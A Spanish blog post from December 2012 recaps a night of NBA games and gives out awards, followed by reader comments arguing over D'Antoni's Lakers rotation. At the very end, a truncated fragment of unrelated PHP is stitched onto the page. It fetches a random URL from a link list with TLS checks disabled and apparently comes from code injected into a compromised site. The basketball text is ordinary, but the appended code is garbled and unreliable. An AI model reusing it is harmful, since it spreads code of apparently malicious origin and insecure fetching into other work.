La Crónica: White Knight Returns

19 de December de 2012 por TheDeerHunter

Vpau kobeolvió Pau. Los Lakers ganaron a Bobcats y Pau tuvo una actuación más que correcta, pero al final la victoria (100-101) fue casi por pura potra con remontada inverosímil incluida, las diabluras habituales de Kobe y una aportación del banco, podemos decir, sin precedentes este curso. D’Antoni no da con la tecla. Anoche sentaba a Metta y acertaba, a costa de haber señalado ahora con el dedo a Jamison. Necesitarán mucho más que todo esto, especialmente en el aspecto defensivo.

Hemos abierto con Pau, pero hay varias actuaciones individuales que lo eclipsan todo. La primera la de Tim Duncan… casi no hay palabras a pesar de que no terminó en buen puerto. Descomunal se queda corto, ya lo desmenuzaremos como mayor esfuerzo en vano. No obstante los Spurs estuvieron menos brillantes colectivamente que en otras ocasiones y, al contrario, los Nuggets cuajaron quizá su partido más completo del año (106-112).

Tampoco significó victoria el increíble triple doble de Jordan Crawford. Los Hawks apretaron nalgas, forzaron prórroga y tiraron de experiencia para pasar el trago (100-95).

También triple doble de Noah, éste sí, para ganar a los Celtics (89-100). Mucho se habla de la crisis amarilla y pronto habrá que hablar de la acera de enfrente.

A otro nivel destacamos a Calde en Cleveland, rompiendo una larga racha de malos resultados foráneos de los Raptors (113-99). No sólo fue el mejor de los suyos en un día en el que muchos estuvieron asombrosamente bien, también logró sujetar relativamente a Irving, al menos comparativamente hablando con respecto a alguna sobresaliente actuación reciente.

Nos quedamos con las ganas de ver a Ricky descansando ante Heat. Fue suficiente una buena, sin más, actuación de Bron y Wade para ganar (92-103).

Del resto, victoria de Utah en Brooklyn (92-90); 34 de Jennings para tumbar a Indiana (93-98); los Sixers confirmaron conato de crisis en Dallas (100-107) y los Warriors siguen imperiales con su victoria ante Hornets (96-103).

jenningsPREMIOS

MVP: LeBron James volvió a ser el hombre orquesta de los Heat con 22 puntos, 11 asistencias, 7 rebotes y 4 tapones. Brandon Jennings también jugó un partido muy completo con 34 puntos, 5 rebotes y 6 asistencias, similar al de Kobe Bryant, autor de 30 puntos, 7 asistencias y 6 rebotes en la sufrida victoria angelina.

Rookie: 15 puntos, 16 rebotes, 4 robos y 1 tapón. Estos son los números que se esperan de Anthony Davis. Bradley Beal estuvo muy fallón de cara al aro pero terminó con 17 puntos, 5 rebotes, 4 asistencias y 2 robos.

Sorpresa: Por fin le entraron mínimamente los tiros a Dorrell Wright. El jugador de los Sixers acabó el partido con 25 puntos.

Decepción: Danny Green solo fue capaz de anotar 1 de los 10 tiros que intentó y se quedó en 3 puntos mientras que Harrison Barnes se quedó sin anotar a pesar de tirar en 5 ocasiones.

Esfuerzo en vano: Nueva exhibición de Tim Duncan (31 puntos, 18 rebotes, 6 asistencias, 2 robos y 5 tapones) que esta vez no ha contado con el premio de la victoria. Jordan Crawford está más acostumbrado a perder pero no a conseguir un triple-doble. 27 puntos, 11 rebotes y 11 asistencias consiguió el jugador de los Wizards.

TOP-10

Imágenes | AP Photos / Getty Images

Comenta

17 comentarios a esta entrada

  1. MagicJohnson32 dice:
    #1

    Novedades en Lakerland: MWP es el nuevo sexto hombre y todo apunta a que Meeks entrará en el quinteto, de manera que Kobe se desplazará al SF. Jamison y Ebanks están en grave riesgo de quedar fuera de la rotación, y ya veremos qué pasa con Hill cuando vuelva de la lesión. No me extrañaría si D’Antoni apuesta por small ball durante muchos minutos, con MWP de 4 como sustituto de Pau (y, a su vez, con Pau como sustituto de Howard).

    Puede que el sábado veamos un quinteto Nash, Meeks, Kobe, Pau, Howard. Y si no es el sábado, será el 25-D.

      Citar

  2. txusma dice:
    #2

    Es decir, que D’Antoni jugará con 8 tíos. Tiene sentido ahora traspasar a Pau principalmente por fondo de banquillo que era lo que se especulaba hasta hace bien poco?

      Citar

  3. GreenPride dice:
    #3

    La cabra tira al monte…. a D’Antoni siempre le gustaron las rotaciones cortas y el small ball. La pregunta es, ¿De verdad tienen los Lakers los jugadores correctos para jugar a eso? Desde mi punto de vista desde luego que no. Veremos si su empecinamiento le acaba por salir bien o como yo creo acaba en fiasco porque parece que no tiene ninguna intención de parar el caballo y hacerles jugar como equipo veterano y experimentado con dos de los hombres altos más dominantes que hay en la liga…. (que es en mi opinión lo que de verdad son)

      Citar

  4. elreylagarto dice:
    #4

    Pues como dice GreenPride, una pena que con esos interiores los Lakers jueguen a todavía no se sabe qué. En fin, doctores tiene la iglesia…o eso dicen.

    Un saludo.
    Lagarto.

      Citar

  5. Denise dice:
    #5

    Desde mis humildes conocimientos, jugar con solo 8 tíos durante una temporada es una estupidez, y mas aun con las caracteristicas de los jugadores de L.A.. Si D’Antoni propone eso, va a suicidarse. Además, no puedes tratar a Jamison y a Hill como si fuesen 2 mierdas para estar sentados en el banco sin jugar.

      Citar

  6. Pop dice:
    #6

    La verdad es que teniendo en potencia a la mejor pareja de torres altas de la liga jugar al small ball se antoja bastante extraño.

      Citar

  7. Esteban dice:
    #7

    habra q ver como termina la historia de los lakers, pero viendo lo que hace d´antoni me parece el peor entrenador que eh visto

    un equipo con pau y howard, y jamison y hill, es por lejos el mejor equipo de juego interior de la liga, y los lkaers juegan a correr y tirar sin meter bolas abajo, mientras jamison y hill ni entran en la rotacion, inexplicable

    pau gasol es el ala pivote mas alto de la NBA, y con mas recursos en el juego de espoalda, pudiendo lanzar ganchos, irse hasta abajo, volcarla y hasta tirar a unos metros, y d´antoni lo hace jugar como ryan anderson… inexplicable

    metta world peace esta teniendo su mejor temporada en los ultimos 3 años y lo manda a la banca

    con nash, kobe, pau, jamison y metta, juegan a correr, a pesar de su edad y su veterania, y mas teniendo en cuenta que en el banco tienen a meeks, eubans blake, que no son ni remotamente agiles ni energicos como para correr la cancha

    creo que lo que esta haciendo d´antoni es lo peor que he visto en NBA, fuera de toda logica y razon

      Citar

  8. Laker1624 dice:
    #8

    Todo por no traer a Phil…

      Citar

  9. Ruxixón dice:
    #9

    Bueno,por decir algo positivo de D’Antoni punto a su favor esta nueva rotación con MWP desde el banquilo.Está claro que es entrenador que impone adaptación a su plantilla,no se adapta a lo que tiene y es cierto,lo desaprovecha,pero si cree que para ganar es mejor esto,mejor abrir ya los ojos y ser realista.A mí no me gusta pero es lo que hay.

    Eso sí,como decís Jordan Hill,Gasol y Jamison quedan en el limbo,y las posiciones de 1-3-4 se pueden reforzar para completar las rotaciones.

      Citar

  10. Jose Luis dice:
    #10

    Ahora es donde tiene sentido cualquier traspaso que involucre a Gasol y Hill. Jamison creo que aún le puede valer por su capacidad de abrir la cancha. Pero vamos, jugando con rotaciones tan cortas, en play-offs lo van a pagar caro. La verdad es que no está gestionando nada bien la plantilla, mitad de culpa es suya por no adaptarse un poco, y mitad de Kupchak y Jim Buss por traer a un entrenador tan opuesto.

      Citar

  11. Jose Luis dice:
    #11

    Opuesto a la configuración de la plantilla quería decir, aún a falta de que llegue Nash y veamos como juegan los Lakers.

      Citar

  12. nba dice:
    #12

    ¡¡¡Demos gracias a D’antoni por abrimos los ojos!!!, ha descubierto al nuevo MagicJohnson , no sabiamos que MWP podia jugar tambien de 4,pero que … esperpento , al menos se ha ganado, habra que preguntarle a Jack a ver que opina de esto.
    Otras franquicias estan desesperadas por tener a jugadores interiores de calidad, y aqui en los Lakers los relegamos al banquillo y los dejamos como meros agitatoallas, ni me quiero imaginar el pifostio que se podia haber montado si se llega a perder en el Staples contra Charlotte, lo que parece evidente es que D’antoni sigue empeñado en hacer ver a la directiva que le sobra un jugador interior, pues que vayan a por Derrick Williams de los Wolves que estan deseando quitarselo de encima

      Citar

  13. Denise dice:
    #13

    nba:
    pues que vayan a por Derrick Williams de los Wolves que estan deseando quitarselo de encima

    A mi Derrick Williams no me gusta. Ofensivamente, me parece un simple ejecutor, cuyos puntos vienen a base de alley-opps y bandejas facilonas. Me parece un jugador pobre en recursos. Si va a otro equipo, no está mal teniendo en cuenta que es joven y tiene un salario de rookie; pero es esa clase de jugador que no le saca de pobre a nadie, ningun equipo daría un salto de calidad por tener a este hombre en sus filas.
    Vamos, que me parece un jugador del montón, aunque a decir verdad, opinaba lo mismo de Evan Turner y ahora me está callando.

      Citar

  14. Esteban dice:
    #14

    tener a pau y howard juntos y no jugar para ellos es una verguenza

    inclusop, tener a howard solo y no jugar para el es una verguenza

    y tener a gasolñ y hacerlo jugar de tirador, es mayor verguenza aun

    habra que ver cuanto corre nash a su edad y despues de la lesion, va a tener que estar a la altura de sus mejores años, y tambien hay q ver cuanta magia llevan los pases de nash para q gasol anote triples…

    la gestion de la plantilla es algo extremadamente raro,

      Citar

  15. nba dice:
    #15

    Denise: A mi Derrick Williams no me gusta. Ofensivamente, me parece un simple ejecutor, cuyos puntos vienen a base de alley-opps y bandejas facilonas.
    Vamos, que me parece un jugador del montón, aunque a decir verdad, opinaba lo mismo de Evan Turner y ahora me está callando.

    teniendo a los mandos a Nash, con eso basta para estos Lakers, jugando en transición o tirando desde fuera, ya que no suele postear, habria que ver si ven con buenos ojos los Wolves a Jordan Hill, asi evitarian en cierta medida que Pekovic se subiese a la parra con su renovacion, yo creo que ganarían todos, Williams por Hill

      Citar

  16. MagicJohnson32 dice:
    #16

    Ufff, por dónde empezar…

    – Por mucho que os empeñéis en decir que los Lakers tienen la mejor pareja interior de la liga, no es cierto. Sobre el papel o por nombres puede que sí, pero en la pista no, lo miremos como lo miremos. Y cada vez que los Lakers ralentizan el juego y buscan balones interiores dan auténtica grima. Primero, porque apenas tienen pasadores que generen buenas posiciones de tiro para los interiores, y segundo porque ni Howard ni Pau están siendo capaces de generarse sus propios tiros con eficacia. Ninguno de los dos está en su mejor estado físico, y poco a poco mejorarán (especialmente cuando vuelva Nash), pero hasta ahora no ha sido así.

    – Es curioso. Mike Brown y D’Antoni son los extremos opuestos en cuanto a sus propuestas, y a ambos les acusáis de convertir a Pau en tirador. Cuando Dwight se va al banco, es Pau quien juega de 5. ¿Cuántas veces postea? Lo repito: el sistema no es el que más le favorece, pero es Gasol quien en la gran mayoría de ocasiones renuncia a postear y opta por el tiro o el pase.

    – ¿MWP al banco cuando mejor está jugando? No sé qué tiene de malo. Va a jugar sus 35-40 minutos y va a jugar de 3 y de 4 para abrir la pista para Howard, que necesita espacio para operar (pierde muchísimos balones cuando le envían ayudas). Su energía está siendo fundamental en los mejores momentos del equipo y sacarlo desde el banquillo puede ayudar a cambiar el ritmo. Para mí, acierto claro.

    – No es verdad que D’Antoni esté forzando a los Lakers a jugar a su manera. ¿Qué hacen los Lakers que se parezca en algo a los Suns? En serio. D’Antoni tiene un equipo que no funciona y está probando cosas diferentes, que no siempre serán de nuestro agrado pero que al menos abren nuevas vías de cara a encontrar soluciones. Y las decisiones que toman son drásticas, sí, pero no son aleatorias. Se ha cargado a Jamison después de 6 partidos lamentables en los que ha promediado 4 ppp, probó con Ebanks cuando jugó unos buenos minutos en el Madison, y ha dejado de probar porque ha comprobado que el chaval no da para más. Meeks, que con Brown ni jugaba, se ha ganado la confianza, los minutos e incluso la titularidad. Quiero decir, que D’Antoni no está haciendo las cosas porque sí.

    – ¿Os dais cuenta de que Jordan Hill no ha jugado más de 15 minutos por partido en ningún equipo? De hecho, los 6 puntos y 5 rebotes que promedia esta temporada son los mejores números de su carrera. Es que habláis de él como si fuese Kevin Love.

    – Y, por último: por el amor de dios, que los Lakers están jugando con el puñetero Chris Duhon de base 30 minutos por partido. ¡¡¡Chris Duhon y sus triples desde 8 metros!!!

    En fin, que a mí no me gusta todo lo que veo, pero al menos ya no siento la frustración de un entrenador cabezón incapaz de innovar, de reconocer el trabajo de los jugadores y de probar cosas para mejorar.

      Citar

  17. Denise dice:
    #17

    MagicJohnson32:

    – ¿Os dais cuenta de que Jordan Hill no ha jugado más de 15 minutos por partido en ningún equipo? De hecho, los 6 puntos y 5 rebotes que promedia esta temporada son los mejores números de su carrera. Es que habláis de él como si fuese Kevin Love.

    – Y, por último: por el amor de dios, que los Lakers están jugando con el puñetero Chris Duhon de base 30 minutos por partido. ¡¡¡Chris Duhon y sus triples desde 8 metros!!!

    sobre Hill: pero los 15 minutos que puede jugar lo hace muy bien, con mucha intensidad y dejandose los huevos en pista (lo que no estan haciendo Pau y Howard por ejemplo). Para mi un jugador muy util para cualquier equipo, una especie de Udonis Haslem pero hasta mejor diria yo.

    Sobre Duhon: Ya me habría gustado que éste hubiese jugado tan bien en Orlando como lo está haciendo en Lakers. Ademas, os ha hecho un apaño bastante util tras las lesiones de Nash y Blake, y ha apartado en su medida de la rotación a ese pésimo base llamado Darius Morris.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>